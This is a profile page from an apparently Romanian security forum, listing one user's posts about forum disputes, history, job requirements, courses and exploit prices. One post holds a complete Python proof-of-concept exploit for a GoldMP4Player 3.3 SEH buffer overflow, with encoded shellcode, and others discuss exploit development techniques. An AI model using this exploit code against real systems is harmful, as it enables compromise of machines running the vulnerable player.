Jump to content

neox

Active Members
  • Posts

    879
  • Joined

  • Last visited

  • Days Won

    24

Everything posted by neox

  1. Das Angebot wird wohl zum Dauerbrenner, denn es funktioniert noch immer. cu ce vrajeala atrage clienti. Prea mult sa solocitat au inchis oferta daca cumperi un an iti da inca un an gratis. Mascheaza imediat fereastra ca sa primesti e-mail.
  2. Nu este bine de loc ce a facut asa ceva nu mai face partea din IT World hot pe fata este santaj clar, trebuie sa suporte consecintele nu se scuza ca este labil ce a scris @j1ll2013 prostia se pedepseste ..
  3. Stupidity not get rid of punishment... Dar oricine merita o sansa dar in cazul lui nu stiu ce sa zic .... acuma am citit ce a postat @aelius nu sintem comunitate de hotii si banditi. Acuma imi este ciuda ca am votat cu nu, nu am inceles eu bine de la inceput dar asa ceva nu merita nici o sansa si pe deasupra se invata si alti minte sa nu faca prostii de genul acesta. publicate fara numar ......
  4. @NO-MERCY next tutorial series exploit development talk about Dep,Aslr win7- win8 and more, a bit egghunter, conditional/unconditional jumps and more .... buffer overflow is easy but many do not know this technique buffer overflow inside use largely heap exploitation in different errors on strcpy,gets,strcpy,strcat,sprintf,getwd and more ...this technique help to locate AAAAAAAA on buffer and then you can control EIP
  5. Se vede ce istorie sa invatat in Romania noi am participat direct la atacul asupra rusilor in Stalingrad. Zona operationala a armatei romane in razboiul impotriva Uniunii Sovietice a fost în mare parte limitata la sectorul sudic al Frontului de Est, in Ucraina Krim si bazinul Donet si Caucaz. 27-28 milioane de rusi au murit noi am fost aliati cu Germania ca nu am omorit noi atitia stim, sa ziciem mersi ca ne-a luat numai "tezaurul p...." In fine intr-un razboi sau conflict totdeauna mor multi oameni nevinovati, cit despre rusii imi place ca le mai da din cand in cand la americani peste nas, ce nu imi place la ei ca mare parte au inca mentalitaeta din ani 90.
  6. Aicia aveti un video Buffer Overflow Inside vulnerabilitatea Memcpy si Strcpy.
  7. Salut baieti despre ce este vorba Acesta este poc-ul GoldMP4Player este vulnerabil via File Flash URL GoldMP4Player 3.3 - Buffer Overflow PoC (SEH) video dezvoltarea exploit final #!/usr/bin/python # coding: utf-8 #Exploit Title: GoldMP4Player Buffer Overflow (SEH) #Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html #Version: 3.3 #Date: 27.02.2014 #Tested on: Windows Win 7 En # Howto / Notes: #open the URL in filename via File -> Open Flash URL\n"; #------------------------------------------------------- '''Credits: Vulnerability POC identified in v3.3 by Gabor Seljan http://www.exploit-db.com/exploits/31914/''' #------------------------------------------------------ head="http://" buff="\x41" * 253 #shell calc.exe buff+=("ëÿÿœ¼‰áÛÖÙqôZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8" "ABuJIylHhlIePePGpapMYJEFQiBBDlKpRVPnk3btLNkv24TlKrRDhdOMgBj7Vtq9oTq9PllUlpac" "LdBFLa09QHO4M31kwjBL01BpWLKpRvpNk3rElFaZpnk1PBXou9PQdPJvajpbplKrhR8NkpXa0wqI" "CIsgLqYlKp4nkgqKfEakOVQIPllzaHOtMuQxGGHYpsEJTVcSMYh5kqm141ehbchNkshtdWqYC0fLK" "fl2klKrx5LWqxSlKgtlKuQxPmYstEtEtsksku10YcjpQkOypf8QOpZLKeBhkk6QMSZ31nmouMiGpEP" "s0f02HdqlKpoLGkOjuOKjPOEI2QFCXi6NuoMomkOju5ls6SL6jOpkKYpsE4EOKBgdSd20orJWppSio" "IERCParLbCDnbEsH0e30AA") head2=".swf" exploit=head + buff + head2 try: out_file = open("exploit.txt",'w') out_file.write(exploit) out_file.close() except: print "Error"
  8. Felicitari hate.me Acuma se nasc visele pe rst
  9. neox

    RST

    Si eu la fel, numai daca dau restart pc pot intra sau reboot router nu tot timpu dar cateodata. Dar nu ma deranjeaza important este ca pot intra
  10. Ce treaba are titlul topicului "Iphone for hackers/ IT Guys" cu ce intrebi tu ? pff ....
  11. Mersi Nytro il folosesc de mult dar abia acuma am observat ca versiunile noi au process scan la virustotal.com eu am tras v16.1 Process Explorer scan un singur process sau scan toate procesele
  12. Asta e o pune de mamaliga La asta m-am referit si eu, sa stii pentru tine este excelent dar sa ceara o firma atatea de la tine nu este bine.
  13. tex mersi de info Nu vreau sa atac pe nimeni sa nu ma incelegeti gresit Dar aicea se vede iara prostia romaneasca cere o gramada de lucruri pe un post de sysadmin mentalitatea ro no sa moara niciodata categoria Audit & Sec "Identificarea vulnerabilitatilor in site-urile web gazduite pe un sistem linux" Trebuie angajat security-guy ce treaba am eu ca administrator cu securitatea iar mai multe puncte din ce cere pentru sysadmin . Este la fel ca si cand intrebi pe un roman, ba ce stii sa faci pe santier ? raspuns stiu sa pun faianta sa zidesc tot stiu prin urmare meseria de cirpacii . Se vede si pe infrastructura internet ro cit este de sigura noua ne place sa ne complicam si sa avem multi cirpacii nu ne place sa avem specialisti intr-un anumit domeniu. De exemplu Germania sysadmin numai in Linux deci nu iti cere alte sisteme daca stii mai mult esti platit mai bine Ihre Aufgaben: - Hardware-Pflege - Software-Aktualisierung und -pflege - Server- und Netzwerk-Konfiguration - Performance-Optimierung - Implementierung von Hochverfügbarkeitslösungen - Backup, (Netzwerk-)Sicherheit usw. Tradus Sarcinile -Între?inere Hardware -Între?inere ?i actualizare de software -Configurare a serverului ?i a re?elei -Optimizarea performan?ei -Punerea în aplicare a High Availability Solutions -Backup (re?ea) de securitate, etc ---------------------------------------------------------------------- Ihre Qualifikation: - Abgeschlossene Ausbildung zum Fachinformatiker/in für Systemintegration oder vergleichbare Qualifikationen - Gute Englischkenntnisse sind vorteilhaft - Linux und LAMP-Kenntnisse - Selbständiges und eigenverantwortliches Arbeiten - Hohe Motivation, Leistungsbereitschaft, schnelles Lernen Calific?rile: -Formare finalizat ca un specialist IT / în integrare de sistem sau calific?ri similare -Bune abilitati de limba engleza sunt avantajoase -Linux ?i LAMP cuno?tin?e -Lucru independent si responsabil -Motiva?ie mare, de angajament, înv??are rapid? Original ••• Stellenangebot: Linux-Systemadministrator/in (Informatiker, Administrator, Netzwerk) in Erlangen (Gigajob Deutschland)
  14. Ce nu imi place la cursul acesta este ca prea multa teorie si nimic practic ""slide cu bla bla"" primul curs 2013 are o scuza (tot asa plin de teorie) dar acuma 2014 tot asa Urasc prezentare genul acesta fara demo nu are nici un farmec prezentarea, tot asa cind mai vad pe youtube de exemplu blackhat o prezentare si vad un tip in fata la un ecran video si prezinta numai pdf (care zice el ca a facut atacul acasa si este o technica noua) si nu demonstreaza nimic practic este numai bla bla In teorie este totdeauna posibil dar practica este ceva diferit.
  15. iti recomand UDEMY - Victor Bastos Become A Web Developer From Scratch daca cauti Web Development All the programming languages covered in this course: HTML XHTML CSS JavaScript PHP MySQL Database XML jSON AJAX jQuery HTML5 CSS3 sau aicia sint mai multe Ruby Tutorial
  16. Daca nu l-ai tradus atunci ce cauta la tutoriale in limba ro
  17. Totul este privat in ziua de astazi , nu uita cum a fost securitatea pe vremea aceia si cum este acuma,atunci sa scris 5 randuri si gata era exploitul faceai un fuzzing si gaseai 10 metode de erori de al le exploata, acuma daca gasesti trebuie sa iti mearga mintea. Daca la un simplu buffer overflow la un player de exemplu partea cu header si footer analizezi sa zicem formatul mp3 inainte iti pica programul cu header si footer standard acuma numai te miri ce trebuie sa bagi in header ca sa primesti o eroare pe desupra cam toti ce-i vechi in domeniu acesta muncesc au familie sau cum a zis "" io.kent (Dece sa ma arat?)""ce stiu pastrez pentru mine. Pe vremea aceea erau toti rambo care mai de care sa se arate sa fie tare dar in general securitatea este mai complexa in ziua de azi, adevarul este ca sunt multe informati in net dar ce este mult strica nu se mai invata, lumea a devenit mai puturoasa inainte faceai pe dracu ca sa obtii o informatie buna acuma majoritatea vor repede ceva scurt si putin de invatat si se vede rezultatul. Nu vreau sa incep de generatia lui peste, dar ca exemplu pe rst se posteaza si lucruri bune si .... dar nimic individual sau prea putin individual sunt luate de altundeva si postate aicia, fie care este egoist daca stie ceva pastreaza pentru el si asa este si cu exploiturile ce este bun sint private sau le vinde.
  18. Raspuns concret nu iti poate da nimeni daca nu sa cumparat, dar este fake la fel ca tot 1337day ... adica exploitul il are dar nu are valoarea de 9mii$ sa fim seriosi este un amarat de ftp. Daca vrei sa cumperi ceva astia sint seriosi Vupen Security , Vulnerable-lab etc... exploituri deci anul trecut asa a fost preturile The price list for a 0-day exploit against the current version of a software Forbes also included the same: https://netzpolitik.org/wp-upload/exploitpricechart.jpg
  19. Ceva are, bravo lui decit nimic. Asa saluti pe cineva care vine nou ? mai ales partea cu meseria .....
  20. Da aici ai dreptate nu ma-m gindit la treaba cu informatiasa fie libara, asta e mai vin si userii destepti si mai vin si .....
  21. Nu ca au avut ceva de genul acesta, cel mai simplu asa : Cerere de inregistrare la categoria prezentare (Bine ai venit ) cererea sa o vada toti useri cu ce stie ce doreste pe forum si ce spera sa invete . Aprobata intra pe forum nu se aproba incearca altadata sau pa pa .
  22. Problema este ca alt forum in ro nu este mai bun ca rst cu userii noi intotdeauna o sa fie probleme.
  23. Extraordinar ce intrebari a pus omul acesta si cu ce vrajeala o invarteste Asteptam banul
  24. Se castiga si cu partea hacking dar trebuie sa inveti (sa investesti in tine bani timp si sa ai disciplina)deci nu un sql, keylogger,trojan si alte gainari de exemplu: Veri sa faci ceva in securitate sa lucrezi ca: Solutions Consultant Security,IT Security Consultant etc... iti trebuie ceva de gen asta ori facultatea in (Informationstechnik = Tehnologia Informatiei) ,(Fachinformatiker systemintegration = Specialist de integrare de sistem) sau scoala de 12 luni ca tip acesta : "securitate in retele si sisteme de operare IDS / IPS, PKI, TCP / IP, IPSec" nu stiu daca la noi este asa ceva pe urma un LPI,CISSP , si te specializezi OSCP sau CEH sau OSCE etc... Dar care nu poate sa investeasca ceva in el (bani sau este trecut in virstra sau scoala) faci cum a supus Gonzalez programarea o poti invata fara sa investesti banii. Numai ca la programare trebuie sa fii foarte bun pentru ca programatori sunt ca nisipul la mare.
×
×
  • Create New...